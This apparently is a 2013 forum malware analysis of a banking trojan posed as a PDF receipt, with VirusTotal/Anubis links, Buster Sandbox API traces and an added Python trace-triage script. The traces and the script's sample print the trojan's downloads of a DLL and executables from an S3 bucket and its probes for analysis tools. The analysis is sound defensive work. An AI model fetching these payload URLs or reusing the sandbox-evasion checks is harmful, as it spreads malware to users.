LoadLibrary(c:\windows\system32\secur32.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\Secur32.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\OLEAUT32.DLL) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\msvcrt.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\ole32.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\VERSION.DLL) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\SHLWAPI.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\WININET.DLL) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\Normaliz.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\URLMON.DLL) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\iertutil.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\WINMM.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\MSCTF.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\PSAPI.DLL) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\MSACM32.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\USERENV.dll) [c:\windows\system32\dwwin.exe]
GetModuleHandle(ntdll) [c:\windows\system32\dwwin.exe]
LoadLibrary(c:\windows\system32\3082\dwintl.dll) [c:\windows\system32\dwwin.exe]
InternetGetConnectedState() [c:\windows\system32\dwwin.exe]
GetUserName() [c:\windows\system32\dwwin.exe]
OpenMutex(Local\_!MSFTHISTORY!_) [c:\windows\system32\dwwin.exe]
GetComputerName() [c:\windows\system32\dwwin.exe]
CreateMutex(Local\_!MSFTHISTORY!_) [c:\windows\system32\dwwin.exe]
OpenMutex(Local\c:!documents and settings!r32!configuración local!archivos temporales de internet!content.ie5!) [c:\windows\system32\dwwin.exe]
CreateMutex(Local\c:!documents and settings!r32!configuración local!archivos temporales de internet!content.ie5!) [c:\windows\system32\dwwin.exe]
CreateFile(C:\Documents and Settings\r32\Configuración local\Archivos temporales de Internet\Content.IE5\index.dat) [c:\windows\system32\dwwin.exe]
OpenMutex(Local\c:!documents and settings!r32!cookies!) [c:\windows\system32\dwwin.exe]
CreateMutex(Local\c:!documents and settings!r32!cookies!) [c:\windows\system32\dwwin.exe]
CreateFile(C:\Documents and Settings\r32\Cookies\index.dat) [c:\windows\system32\dwwin.exe]
OpenMutex(Local\c:!documents and settings!r32!configuración local!historial!history.ie5!) [c:\windows\system32\dwwin.exe]
CreateMutex(Local\c:!documents and settings!r32!configuración local!historial!history.ie5!) [c:\windows\system32\dwwin.exe]
CreateFile(C:\Documents and Settings\r32\Configuración local\Historial\History.IE5\index.dat) [c:\windows\system32\dwwin.exe]
OpenMutex(Local\WininetStartupMutex) [c:\windows\system32\dwwin.exe]
LoadLibrary(ws2_32) [c:\windows\system32\dwwin.exe]
LoadLibrary(ws2_32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(ws2help.dll) [c:\windows\system32\dwwin.exe]
GetModuleHandle(shlwapi.dll) [c:\windows\system32\dwwin.exe]
OpenMutex(Local\WininetConnectionMutex) [c:\windows\system32\dwwin.exe]
OpenMutex(Local\WininetProxyRegistryMutex) [c:\windows\system32\dwwin.exe]
LoadLibrary(rasapi32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(rasman.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(netapi32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(tapi32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(rtutils.dll) [c:\windows\system32\dwwin.exe]
CreateMutex(RasPbFile) [c:\windows\system32\dwwin.exe]
OpenMutex(RasPbFile) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\RASAPI32.dll) [c:\windows\system32\dwwin.exe]
RasEnumEntries() [c:\windows\system32\dwwin.exe]
OpenSCManager((null),(null)) [c:\windows\system32\dwwin.exe]
OpenService(RASMAN) [c:\windows\system32\dwwin.exe]
LoadLibrary(msapsspc.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(msvcrt40.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\msapsspc.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(schannel.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(crypt32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(msasn1.dll) [c:\windows\system32\dwwin.exe]
CreateEvent(Global\crypt32LogoffEvent) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\schannel.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(digest.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\digest.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(msnsspc.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\msnsspc.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(c:\windows\system32\msv1_0.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(cryptdll.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(iphlpapi.dll) [c:\windows\system32\dwwin.exe]
lstrcmpi(COMPUTERNAME,TEMP) [c:\windows\system32\dwwin.exe]
lstrcmpi(COMPUTERNAME,TMP) [c:\windows\system32\dwwin.exe]
OpenService(Sens) [c:\windows\system32\dwwin.exe]
LoadLibrary(sensapi.dll) [c:\windows\system32\dwwin.exe]
OpenProcess(ctfmon.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(SbieCtrl.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(explorer.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(u1210.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(wireshark.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(sniff_hit.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(iexplore.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(firefox.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(VBoxTray.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(procexp.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(BSA.EXE) [c:\windows\system32\dwwin.exe]
OpenProcess(XueTr.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(dumpcap.exe) [c:\windows\system32\dwwin.exe]
GetSystemDefaultLangID() [c:\windows\system32\dwwin.exe]
SetWindowPos(20994,TOPMOST) [c:\windows\system32\dwwin.exe]
GetForegroundWindow() [c:\windows\system32\dwwin.exe]
FindWindow(Shell_TrayWnd,(null)) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\windows\system32\dwwin.exe]
OpenProcess(csrss.exe) [c:\windows\system32\dwwin.exe]
CreateMutex(MSCTF.Shared.MUTEX.EBH) [c:\windows\system32\dwwin.exe]
GetModuleHandle(ole32.dll) [c:\windows\system32\dwwin.exe]
DeleteFile(C:\DOCUME~1\r32\CONFIG~1\Temp\597A56.dmp) [c:\windows\system32\dwwin.exe]
DeleteFile(C:\DOCUME~1\r32\CONFIG~1\Temp\74b4_appcompat.txt) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\3082\dwintl.dll) [c:\windows\system32\dwwin.exe]
ExitProcess(0) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\rasman.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\rtutils.dll) [c:\windows\system32\dwwin.exe]
VirtualAllocEx(c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe,MEM_COMMIT,PAGE_READWRITE) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
VirtualAllocEx(c:\windows\system32\drwtsn32.exe,MEM_COMMIT,PAGE_READWRITE) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
OpenProcess(drwtsn32.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
WriteProcessMemory(c:\windows\system32\drwtsn32.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
VirtualAllocEx(c:\windows\system32\drwtsn32.exe,MEM_RESERVE,PAGE_READWRITE) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
Executing: c:\windows\system32\drwtsn32.exe
LoadLibrary(msvcrt.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(advapi32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(kernel32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(gdi32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(user32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(dbgeng.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(dbghelp.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(version.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(shimeng.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(c:\windows\apppatch\acgenral.dll) [c:\windows\system32\drwtsn32.exe]
GetModuleHandle(kernel32.dll) [c:\windows\system32\drwtsn32.exe]
VirtualQueryEx(c:\windows\system32\drwtsn32.exe) [c:\windows\system32\drwtsn32.exe]
CreateMutex(SHIMLIB_LOG_MUTEX) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(winmm.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(ole32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(oleaut32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(msacm32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(shell32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(shlwapi.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(userenv.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(uxtheme.dll) [c:\windows\system32\drwtsn32.exe]
GetModuleHandle(lz32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(lz32.dll) [c:\windows\system32\drwtsn32.exe]
CreateEvent(DINPUTWINMM) [c:\windows\system32\drwtsn32.exe]
GetModuleHandle(Kernel32) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(comctl32.dll) [c:\windows\system32\drwtsn32.exe]
GetModuleHandle(EXPLORER.EXE) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\windows\system32\drwtsn32.exe]
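Added example (my own code, not from the post above nor from Buster Sandbox): a small Python triage script for the BSA trace format used in these logs, `API(args) [calling process]`, which pulls out download URLs, spawned processes, connections and the OpenProcess probes for analysis tools that these samples perform. The ANALYSIS_TOOLS list and the lab path in the embedded sample trace are assumptions; the URLs and the C:\wina drop folder are the ones the traces on this page show.

```python
"""Triage helper for Buster Sandbox Analyzer (BSA) API traces.

BSA writes one line per hooked API call, in the form
    API(arg1,arg2,...) [c:\\path\\of\\calling\\process.exe]
This parser pulls out what a responder looks at first: download URLs,
processes spawned, outbound connections, and the OpenProcess probes the
sample uses to look for analysis tools (a sandbox-evasion check).
"""
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# One trace line: API name, parenthesised argument list, calling process in [].
LINE_RE = re.compile(r"^(?P<api>\w+)\((?P<args>.*)\)\s*\[(?P<proc>[^\]]*)\]\s*$")

# Lower-cased names of analysis tools the samples looked for via OpenProcess
# (assumed list, built from the traces on this page); extend it for your lab.
ANALYSIS_TOOLS = {
    "procexp.exe", "wireshark.exe", "dumpcap.exe", "bsa.exe", "xuetr.exe",
    "vboxtray.exe", "sbiectrl.exe", "regwatcher.exe", "sniff_hit.exe", "pm.exe",
}


@dataclass
class Call:
    api: str
    args: list
    proc: str


@dataclass
class Triage:
    downloads: list = field(default_factory=list)     # (url, host) pairs
    spawned: list = field(default_factory=list)       # command lines run
    connections: list = field(default_factory=list)   # "ip:port" strings
    probed_tools: list = field(default_factory=list)  # analysis tools looked up


def parse_line(line: str):
    """Return a Call for an API line, or None for 'Executing:' and blank lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    raw = m.group("args")
    args = [a.strip() for a in raw.split(",")] if raw else []
    return Call(m.group("api"), args, m.group("proc").lower())


def triage(lines):
    """Walk a trace and collect the indicators worth escalating."""
    t = Triage()
    for line in lines:
        call = parse_line(line)
        if call is None:
            continue
        if call.api == "URLDownloadToFile" and call.args:
            url = call.args[0]
            t.downloads.append((url, urlsplit(url).hostname or ""))
        elif call.api == "CreateProcess":
            # BSA logs (app, cmdline, cwd); "(null)" marks unused parameters.
            cmd = next((a for a in call.args if a != "(null)"), "")
            if cmd:
                t.spawned.append(cmd)
        elif call.api == "connect" and call.args:
            t.connections.append(call.args[0])
        elif call.api == "OpenProcess" and call.args:
            name = call.args[0].lower()
            if name in ANALYSIS_TOOLS and name not in t.probed_tools:
                t.probed_tools.append(name)
    return t


def report(t: Triage):
    """Human-readable summary; the evasion line fires on any tool probe."""
    out = [f"download {url} (host {host})" for url, host in t.downloads]
    out += [f"spawned {cmd}" for cmd in t.spawned]
    out += [f"connect {dst}" for dst in t.connections]
    if t.probed_tools:
        out.append("evasion: looked for " + ", ".join(t.probed_tools))
    return out


# Constructed excerpt in BSA's format: the lab path is made up, the URLs and
# the C:\wina drop folder are the ones seen in the traces on this page.
SAMPLE_TRACE = r"""
Executing: c:\lab\sample\comprovante.pdf2.exe
OpenProcess(explorer.exe) [c:\lab\sample\comprovante.pdf2.exe]
OpenProcess(wireshark.exe) [c:\lab\sample\comprovante.pdf2.exe]
OpenProcess(procexp.exe) [c:\lab\sample\comprovante.pdf2.exe]
OpenProcess(procexp.exe) [c:\lab\sample\comprovante.pdf2.exe]
URLDownloadToFile(https://s3-sa-east-1.amazonaws.com/banolo99/jjca.dll) [c:\lab\sample\comprovante.pdf2.exe]
connect( 127.0.0.1:2673 ) [c:\lab\sample\comprovante.pdf2.exe]
URLDownloadToFile(https://s3-sa-east-1.amazonaws.com/banolo99/Projeto.exe) [c:\lab\sample\comprovante.pdf2.exe]
CreateProcess((null),C:\wina\Projeto.exe,(null)) [c:\lab\sample\comprovante.pdf2.exe]
OpenSCManager((null),(null)) [c:\lab\sample\comprovante.pdf2.exe]
"""

if __name__ == "__main__":
    for line in report(triage(SAMPLE_TRACE.splitlines())):
        print(line)
```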
880  Computer Security / Malware Analysis and Design / Banking trojan II (different configuration). on: 16 February 2013, 14:34 pm
From the same e-mail contact I receive another sample; it behaves differently and downloads a sizeable batch of files.
This time I analysed the executable with "Buster Sandbox".

URL: Ask by PM.

Online analysis:

Comprovante.pdf.exe:
VirusTotal: https://www.virustotal.com/file/a8dd1f76473cb69e7012964a5d723cb81014a13413df572735c7ae28b9e297cd/analysis/1360255230/
Anubis: http://anubis.iseclab.org/?action=result&task_id=1a9a78b746cd486e4adb6aa28bdf02761&call=first

Downloaded files:

jjca.dll:
VirusTotal: https://www.virustotal.com/file/fa3651cfcd2aca6c7303ef8017986669465b724dc96ceaddcb249f66b487d420/analysis/1360254397/
Anubis: http://anubis.iseclab.org/?action=result&task_id=18c69386fee0475e4d56e22cb9bc33ac6

jsob.exe:
VirusTotal: https://www.virustotal.com/file/d4ae23bf307150d9fd664eaac06bcce9d2101d946089a506b25f3f84d8248a8e/analysis/1360254575/
Anubis:

jsobs.exe:
VirusTotal: https://www.virustotal.com/file/e914bda041273705403f2a968f557f67053b609daae77ca37c05f97d922a9261/analysis/1360254739/
Anubis: http://anubis.iseclab.org/?action=result&task_id=1d19bec75e40ba5e461ef3b2548210e08

Projeto.exe:
VirusTotal: https://www.virustotal.com/file/b727103a389dad4ab9e773906e898c30e50b0f0191a8299b27afaefca853f49e/analysis/1360254942/
Anubis: http://anubis.iseclab.org/?action=result&task_id=161f701d97b086d7421afd1ae0c2ba446

winsa64.exe:
VirusTotal: https://www.virustotal.com/file/b727103a389dad4ab9e773906e898c30e50b0f0191a8299b27afaefca853f49e/analysis/1360255019/
Anubis: http://anubis.iseclab.org/?action=result&task_id=1abaf0d0a6553c1e4bda858417f3f38f7&call=first

Compression and compiler (screenshot not reproduced):

Execution of Comprovante.pdf.exe:

Code:
Executing: c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe
LoadLibrary(kernel32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(advapi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(comctl32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(msvcrt.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(shlwapi.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(gdi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(oleaut32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(ole32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(urlmon.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(iertutil.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(user32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(version.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(lz32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(lz32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(kernel32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
VirtualQueryEx(c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(Kernel32) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcessToken(C:\Documents and Settings\r32\Mis documentos\Descargas\Comprovante\Comprovante.pdf2.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(oleaut32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(USER32.DLL) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\uxtheme.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
IsDebuggerPresent() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\uxtheme.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
BitBlt() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(version.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(ShimCacheMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\msctfime.ime) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\Documents and Settings\r32\Mis documentos\Descargas\Comprovante\Comprovante.pdf2.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(USER32) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(comctl32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETWORKAREA,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SetTimer(b01a0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SetTimer(13020c) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SetTimer(1001c4) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(explorer.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(ctfmon.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(sniff_hit.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(wireshark.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(SbieCtrl.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(VBoxTray.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(procexp.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(Pm.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetForegroundWindow() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\WINDOWS\system32\Msimtf.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SetTimer(1401a8) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
URLDownloadToFile(https://s3-sa-east-1.amazonaws.com/banolo99/jjca.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\!IETld!Mutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(rpcrt4.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetComputerName() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\!IETld!Mutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\URLMON.DLL) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(wininet.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
ResumeThread() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(normaliz.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(Advapi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
InternetSetOption() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetUserName() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(secur32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(shell32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(LPK.DLL) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\_!MSFTHISTORY!_) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\_!MSFTHISTORY!_) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\c:!documents and settings!r32!configuración local!archivos temporales de internet!content.ie5!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\c:!documents and settings!r32!configuración local!archivos temporales de internet!content.ie5!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateFile(C:\Documents and Settings\r32\Configuración local\Archivos temporales de Internet\Content.IE5\index.dat) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\c:!documents and settings!r32!cookies!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\c:!documents and settings!r32!cookies!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateFile(C:\Documents and Settings\r32\Cookies\index.dat) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\c:!documents and settings!r32!configuración local!historial!history.ie5!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\c:!documents and settings!r32!configuración local!historial!history.ie5!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateFile(C:\Documents and Settings\r32\Configuración local\Historial\History.IE5\index.dat) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\WininetStartupMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(ws2_32) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(ws2_32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(ws2help.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(shlwapi.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\WininetConnectionMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\WininetProxyRegistryMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
